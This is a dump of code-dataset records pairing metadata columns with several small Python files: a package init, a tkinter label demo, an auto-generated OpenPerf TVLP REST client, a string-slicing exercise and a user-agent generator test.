| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
d75ed40e3c19ebdc37e2ec7210107b403779c963
| 87
|
py
|
Python
|
moses/organ/__init__.py
|
rtriangle/moses
|
1ef94d32f94f4f1cd7d46a91c76722bfa8a70632
|
[
"MIT"
] | 2
|
2020-07-10T03:09:17.000Z
|
2020-07-10T04:28:01.000Z
|
moses/organ/__init__.py
|
stephenra/moses
|
32dbc64c23bbae23fd964238108aa5c85852d537
|
[
"MIT"
] | null | null | null |
moses/organ/__init__.py
|
stephenra/moses
|
32dbc64c23bbae23fd964238108aa5c85852d537
|
[
"MIT"
] | null | null | null |
from .config import * # noqa
from .model import * # noqa
from .trainer import * # noqa
| 21.75
| 29
| 0.689655
| 12
| 87
| 5
| 0.5
| 0.5
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.206897
| 87
| 3
| 30
| 29
| 0.869565
| 0.16092
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d7687e6959b1e2f028f05deb4dc5ef8a6da2108f
| 503
|
py
|
Python
|
Location.py
|
arpansarkar190794/Arpan_Sarkar
|
b36f66f0ed00668b005fae903ce463883a803fd5
|
[
"bzip2-1.0.6"
] | null | null | null |
Location.py
|
arpansarkar190794/Arpan_Sarkar
|
b36f66f0ed00668b005fae903ce463883a803fd5
|
[
"bzip2-1.0.6"
] | null | null | null |
Location.py
|
arpansarkar190794/Arpan_Sarkar
|
b36f66f0ed00668b005fae903ce463883a803fd5
|
[
"bzip2-1.0.6"
] | null | null | null |
from tkinter import *
gui = Tk()
def Name():
Label (text='Bangalore',fg='red',bg='white',font=('arial',24,'italic')).pack(pady=10,fill=X)
Label (text='Karnataka',fg='Yellow',bg='white',font=('arial',24,'italic')).pack(pady=10,fill=X)
def Name1():
Label (text='Bangalore',fg='red',bg='white',font=('arial',24,'italic')).pack(pady=10)
Label (text='Karnataka',fg='Yellow',bg='white',font=('arial',24,'italic')).pack(pady=10)
Name()
Name1()
gui.mainloop
| 33.533333
| 100
| 0.59841
| 73
| 503
| 4.123288
| 0.369863
| 0.119601
| 0.146179
| 0.212625
| 0.810631
| 0.810631
| 0.810631
| 0.810631
| 0.810631
| 0.810631
| 0
| 0.042056
| 0.149105
| 503
| 14
| 101
| 35.928571
| 0.661215
| 0
| 0
| 0
| 0
| 0
| 0.241309
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.090909
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d7742e466a3a923966f1e73b826b43872d15c153
| 34,613
|
py
|
Python
|
tests/aat/api/v1/client/api/tvlp_api.py
|
gchagnotSpt/openperf
|
0ae14cb7a685b1b059f707379773fb3bcb421d40
|
[
"Apache-2.0"
] | 20
|
2019-12-04T01:28:52.000Z
|
2022-03-17T14:09:34.000Z
|
tests/aat/api/v1/client/api/tvlp_api.py
|
gchagnotSpt/openperf
|
0ae14cb7a685b1b059f707379773fb3bcb421d40
|
[
"Apache-2.0"
] | 115
|
2020-02-04T21:29:54.000Z
|
2022-02-17T13:33:51.000Z
|
tests/aat/api/v1/client/api/tvlp_api.py
|
gchagnotSpt/openperf
|
0ae14cb7a685b1b059f707379773fb3bcb421d40
|
[
"Apache-2.0"
] | 16
|
2019-12-03T16:41:18.000Z
|
2021-11-06T04:44:11.000Z
|
# coding: utf-8
"""
OpenPerf API
REST API interface for OpenPerf # noqa: E501
OpenAPI spec version: 1
Contact: support@spirent.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from client.api_client import ApiClient
class TVLPApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_tvlp_configuration(self, configuration, **kwargs): # noqa: E501
"""Create a TVLP configuration # noqa: E501
Create a new TVLP configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_tvlp_configuration(configuration, async_req=True)
>>> result = thread.get()
:param async_req bool
:param TvlpConfiguration configuration: New TVLP configuration (required)
:return: TvlpConfiguration
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_tvlp_configuration_with_http_info(configuration, **kwargs) # noqa: E501
else:
(data) = self.create_tvlp_configuration_with_http_info(configuration, **kwargs) # noqa: E501
return data
def create_tvlp_configuration_with_http_info(self, configuration, **kwargs): # noqa: E501
"""Create a TVLP configuration # noqa: E501
Create a new TVLP configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_tvlp_configuration_with_http_info(configuration, async_req=True)
>>> result = thread.get()
:param async_req bool
:param TvlpConfiguration configuration: New TVLP configuration (required)
:return: TvlpConfiguration
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['configuration'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_tvlp_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'configuration' is set
if ('configuration' not in params or
params['configuration'] is None):
raise ValueError("Missing the required parameter `configuration` when calling `create_tvlp_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'configuration' in params:
body_params = params['configuration']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TvlpConfiguration', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_tvlp_configuration(self, id, **kwargs): # noqa: E501
"""Delete a TVLP configuration # noqa: E501
Deletes an existing TVLP configuration. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tvlp_configuration(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_tvlp_configuration_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a TVLP configuration # noqa: E501
Deletes an existing TVLP configuration. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tvlp_configuration_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_tvlp_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_tvlp_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_tvlp_result(self, id, **kwargs): # noqa: E501
"""Delete a TVLP result. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tvlp_result(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_tvlp_result_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_tvlp_result_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_tvlp_result_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a TVLP result. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tvlp_result_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_tvlp_result" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_tvlp_result`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp-results/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tvlp_configuration(self, id, **kwargs): # noqa: E501
"""Get a TVLP configuration # noqa: E501
Returns a TVLP configuration, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tvlp_configuration(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TvlpConfiguration
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
return data
def get_tvlp_configuration_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a TVLP configuration # noqa: E501
Returns a TVLP configuration, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tvlp_configuration_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TvlpConfiguration
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tvlp_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_tvlp_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TvlpConfiguration', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tvlp_result(self, id, **kwargs): # noqa: E501
"""Get a result from a TLVP configuration # noqa: E501
Returns results from a TVLP configuration by result id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tvlp_result(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TvlpResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_tvlp_result_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_tvlp_result_with_http_info(id, **kwargs) # noqa: E501
return data
def get_tvlp_result_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a result from a TLVP configuration # noqa: E501
Returns results from a TVLP configuration by result id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tvlp_result_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TvlpResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tvlp_result" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_tvlp_result`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp-results/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TvlpResult', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_tvlp_configurations(self, **kwargs): # noqa: E501
"""List TVLP configurations # noqa: E501
The `tvlp` endpoint returns all of the TVLP configurations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tvlp_configurations(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TvlpConfiguration]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_tvlp_configurations_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_tvlp_configurations_with_http_info(**kwargs) # noqa: E501
return data
def list_tvlp_configurations_with_http_info(self, **kwargs): # noqa: E501
"""List TVLP configurations # noqa: E501
The `tvlp` endpoint returns all of the TVLP configurations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tvlp_configurations_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TvlpConfiguration]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_tvlp_configurations" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TvlpConfiguration]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_tvlp_results(self, **kwargs): # noqa: E501
"""List TVLP results # noqa: E501
The `tvlp-results` endpoint returns all of the results produced by running TVLP configurations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tvlp_results(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TvlpResult]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_tvlp_results_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_tvlp_results_with_http_info(**kwargs) # noqa: E501
return data
def list_tvlp_results_with_http_info(self, **kwargs): # noqa: E501
"""List TVLP results # noqa: E501
The `tvlp-results` endpoint returns all of the results produced by running TVLP configurations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tvlp_results_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TvlpResult]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_tvlp_results" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp-results', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TvlpResult]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def start_tvlp_configuration(self, id, **kwargs): # noqa: E501
"""Start a TVLP configuration # noqa: E501
Start an existing TVLP configuration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_tvlp_configuration(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:param TvlpStartConfiguration start: TVLP Start parameters
:return: TvlpResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.start_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.start_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
return data
def start_tvlp_configuration_with_http_info(self, id, **kwargs): # noqa: E501
"""Start a TVLP configuration # noqa: E501
Start an existing TVLP configuration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_tvlp_configuration_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:param TvlpStartConfiguration start: TVLP Start parameters
:return: TvlpResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'start'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method start_tvlp_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `start_tvlp_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'start' in params:
body_params = params['start']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp/{id}/start', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TvlpResult', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def stop_tvlp_configuration(self, id, **kwargs): # noqa: E501
"""Stop a TVLP configuration # noqa: E501
Stop a running TVLP configuration. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.stop_tvlp_configuration(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.stop_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.stop_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
return data
def stop_tvlp_configuration_with_http_info(self, id, **kwargs): # noqa: E501
"""Stop a TVLP configuration # noqa: E501
Stop a running TVLP configuration. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.stop_tvlp_configuration_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method stop_tvlp_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `stop_tvlp_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp/{id}/stop', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 37.952851
| 133
| 0.604917
| 3,902
| 34,613
| 5.118913
| 0.043311
| 0.055272
| 0.025233
| 0.032442
| 0.966657
| 0.963302
| 0.958997
| 0.950986
| 0.947332
| 0.94613
| 0
| 0.017505
| 0.305174
| 34,613
| 911
| 134
| 37.994512
| 0.813015
| 0.330598
| 0
| 0.817248
| 1
| 0
| 0.165299
| 0.041688
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039014
| false
| 0
| 0.008214
| 0
| 0.104723
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ad76edca5247bb44331d9f3d8b47b2d7fbcde7da
| 37
|
py
|
Python
|
CodeUP/Python basic 100/6022.py
|
cmsong111/NJ_code
|
2df6176d179e168a2789a825ddeb977a82eb8d97
|
[
"MIT"
] | null | null | null |
CodeUP/Python basic 100/6022.py
|
cmsong111/NJ_code
|
2df6176d179e168a2789a825ddeb977a82eb8d97
|
[
"MIT"
] | null | null | null |
CodeUP/Python basic 100/6022.py
|
cmsong111/NJ_code
|
2df6176d179e168a2789a825ddeb977a82eb8d97
|
[
"MIT"
] | null | null | null |
s=input()
print(s[:2],s[2:4],s[4:6])
| 12.333333
| 26
| 0.513514
| 11
| 37
| 1.727273
| 0.545455
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0.054054
| 37
| 2
| 27
| 18.5
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
ad83e06fa8f1c8cf4eadc2c08bcc0419202d0d94
| 760
|
py
|
Python
|
tests/test_user_agent.py
|
fujiawei-dev/tookit-py
|
5ab3a18a41885f6166150cc27183621b96f8f991
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_user_agent.py
|
fujiawei-dev/tookit-py
|
5ab3a18a41885f6166150cc27183621b96f8f991
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_user_agent.py
|
fujiawei-dev/tookit-py
|
5ab3a18a41885f6166150cc27183621b96f8f991
|
[
"BSD-3-Clause"
] | null | null | null |
from user_agent.generate import Browser, OS, generate_user_agent
def test_generate_user_agent():
print(generate_user_agent())
print(generate_user_agent(OS.Windows, platform=None))
print(generate_user_agent(OS.Linux, platform=None))
print(generate_user_agent(OS.Mac, platform=None))
print(generate_user_agent(OS.IOS, platform=None))
print(generate_user_agent(OS.Android, platform=None))
print(generate_user_agent(browser=Browser.Safari, platform=None))
print(generate_user_agent(browser=Browser.Chrome, platform=None))
print(generate_user_agent(browser=Browser.Firefox, platform=None))
print(generate_user_agent(browser=Browser.Opera, platform=None))
print(generate_user_agent(browser=Browser.Edge, platform=None))
| 47.5
| 70
| 0.789474
| 104
| 760
| 5.5
| 0.211538
| 0.22028
| 0.386364
| 0.423077
| 0.781469
| 0.777972
| 0.777972
| 0.41958
| 0
| 0
| 0
| 0
| 0.098684
| 760
| 15
| 71
| 50.666667
| 0.835037
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| true
| 0
| 0.076923
| 0
| 0.153846
| 0.846154
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
